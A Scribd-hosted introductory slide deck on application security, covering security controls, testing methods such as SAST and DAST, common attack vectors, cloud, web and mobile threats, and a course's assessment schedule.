Scribd
Upload
30 views19 pages

AppSec Intro

Application security (AppSec) protects software applications from threats throughout their lifecycle, preventing unauthorized access and data theft. It has evolved from traditional monolithic applications to modern cloud-based microservices, requiring various security measures such as threat modeling, secure coding, and vulnerability scanning. Ensuring robust application security is crucial for maintaining business continuity, customer trust, and regulatory compliance while mitigating risks of cyber attacks.

Uploaded by

ahmad zahiri mohamed hassan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
30 views19 pages

AppSec Intro

Application security (AppSec) protects software applications from threats throughout their lifecycle, preventing unauthorized access and data theft. It has evolved from traditional monolithic applications to modern cloud-based microservices, requiring various security measures such as threat modeling, secure coding, and vulnerability scanning. Ensuring robust application security is crucial for maintaining business continuity, customer trust, and regulatory compliance while mitigating risks of cyber attacks.

Uploaded by

ahmad zahiri mohamed hassan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 19

Application Security

(AppSec) and Its


Importance
Application security (AppSec) protects software applications from
threats throughout their lifecycle. It prevents unauthorized access,
data theft, and operational disruptions.
What is Application
Security?
Definition Purpose
Processes, techniques, and Prevents adversaries from
tools that protect software exploiting vulnerabilities to
applications from threats gain unauthorized access or
throughout their lifecycle. steal data.

Evolution
Has evolved from monolithic on-premise applications to cloud-
based microservices architecture.
Traditional vs. Modern Applications
Traditional Applications Modern Cloud Applications

Monolithic architecture with all components combined Microservice architecture with independent services for
into a single program. easier updates.

Installed on single machines, often on-premises or self- Deployed in single-cloud or multi-cloud environments.
hosted.
Automatically adjust resources based on demand for
Updates require altering the entire system with manual flexibility and scalability.
maintenance.
Continuously download updates and patches
automatically.
How Application Security Works
1 Threat Modeling
Analyzing applications to identify potential vulnerabilities and develop
mitigating controls.

2 Secure Coding
Writing code less vulnerable to attacks using input validation and error
handling.

3 Vulnerability Scanning
Using automated tools to scan for vulnerabilities like unpatched software
and misconfigurations.

4 Access Control
Implementing authentication and authorization to ensure only authorized
users access applications.
More Security Controls

Encryption Firewalls Security Monitoring


Translating data into Creating barriers
another form that only between external Watching applications
people with access to a networks and for suspicious activity
secret key can read. applications to block and responding to
unauthorized access. incidents promptly.

Web Application
Firewalls
Monitoring and filtering
traffic to prevent
common web attacks
like SQL injection.
Why Application Security Matters
Business Continuity
1 Maintains operations

Customer Trust
2 Builds loyalty

Regulatory Compliance
3 Avoids penalties

Attack Prevention
4 Reduces breach risk

Data Protection
5 Safeguards sensitive information

Organizations rely on applications to handle sensitive data and run operations. Proper security reduces cyber attack risks and builds customer trust.
Application Security Testing
Types
1 Static Application Security Testing (SAST)
Analyzes source code during development to identify vulnerabilities
before deployment.

2 Dynamic Application Security Testing (DAST)


Tests running applications to identify vulnerabilities and observe
responses to simulated attacks.

3 Interactive Application Security Testing (IAST)


Combines SAST and DAST techniques to detect vulnerabilities in real-time
during application use.

4 Software Composition Analysis (SCA)


Scans code to identify third-party and open-source components and
detect common vulnerabilities.
More Testing Approaches
Runtime Application Self-Protection (RASP)
Monitors applications while running to protect against
behaviors that traditional security might miss.

API Testing
Verifies reliability, performance, and security of API endpoints
that enable information sharing.

Infrastructure as Code (IAC) Testing


Tests code used to automate infrastructure deployment to
verify reliability and correctness.

Penetration Testing
Simulates cyber attacks to identify vulnerabilities and
security weaknesses that attackers could exploit.
Consequences of Inadequate Security

Data Breaches Financial Loss Reputational Business Disruption


Damage
Unauthorized access to Direct costs from System downtime and
sensitive customer or breaches, regulatory fines, Loss of customer trust and operational interruptions
business data leading to and lost business brand value after security affecting service delivery.
exposure. opportunities. incidents become public.
Common Cyber Attack Vectors
Malware Attacks
Phishing Attacks
Malicious software designed to
Fraudulent messages tricking 2 damage systems or steal data.
recipients into revealing sensitive 1
information.
SQL Injection
Inserting malicious SQL code into
3 database queries.
DDoS Attacks 5
Overwhelming systems with traffic Cross-Site Scripting
to cause service disruption. 4 Injecting malicious scripts into
trusted websites.
More Common Attack Vectors
Malicious Insiders
1 Employees or contractors abusing legitimate access

Password Attacks
2 Attempts to crack or steal authentication credentials

Misconfiguration
3 Security gaps from improper system setup

Poor Encryption
4 Weak or missing data protection

These attack vectors represent common ways adversaries target applications. Organizations must implement controls to address
each type of threat.
The OWASP Top 10 and API Top 10

What Is It? Based On


A standardized list of the Real-world data and
most critical security risks to feedback from security
web applications maintained experts, making it a reliable
by the Open Web guide for application
Application Security Project. security.

Benefits
Provides a common language for discussing risks and
solutions, helping organizations communicate about security
posture.
Cloud Application Security
1 Definition
Practices and technologies that protect applications, infrastructure,
and data in cloud environments.

2 Importance
Essential for organizations using third-party cloud providers like
Amazon, Google, or Microsoft.

3 Challenges
Third-party relationships can increase the attack surface by exposing
new vulnerabilities and risks.

4 Common Threats
Misconfigured environments, poor encryption, weak access controls,
and DDoS attacks.
Web Application Security
Definition Benefits Challenges

Protection of websites and online Web applications provide cross- Complex infrastructure makes web
services against vulnerabilities, platform compatibility and applications susceptible to
threats, and attacks. accessibility through any browser. vulnerabilities at each layer.

Common threats include SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), insecure direct
object references, and unvalidated redirects.
Mobile Application Security

Mobile application security protects apps on smartphones and devices. With widespread mobile use, these applications are critical to
business operations and handle significant user data.
Mobile Security Threats

Insecure API Man-in-the-Middle Code Tampering


Connections Attacks
Hackers modify source
Inadequately Attackers manipulate code of open-source
integrated APIs that data exchanged libraries to introduce
expose sensitive data between the vulnerabilities.
or functionality. application and server.

Reverse
Engineering
Attackers analyze
application code to
understand and exploit
its inner workings.
Implementing Effective
AppSec
Assess Current Posture
Evaluate existing applications and identify security gaps through
comprehensive scanning.

Develop Security Strategy


Create a plan that addresses identified vulnerabilities and
establishes security standards.

Implement Controls
Deploy appropriate security measures based on risk
assessment and business needs.

Continuous Monitoring
Regularly scan for new vulnerabilities and maintain
vigilance against emerging threats.
Your APPSEC Journey

Authentication, Authorization
Develop a secure Web App with Authentication and Authorization
using the Nodejs Stack

Open Web Application Security Project (OWASP API)


Implement OWASP into Web Application
Important Dates
 Part 1: Assignment Submission (20%) - Week 06
 Part 2: Assignment Presentation & Demonstrations (10%) - Week 07
 Part 3: Case Study Interim Submission (20%) - Week 12
 Part 4: Interim Presentation & Demonstrations (10%) - Week 13
 Part 5: Case Study Final Submission (20%) - Week 16
 Part 6: Final Presentation & Demonstrations (20%) - Week 17

You might also like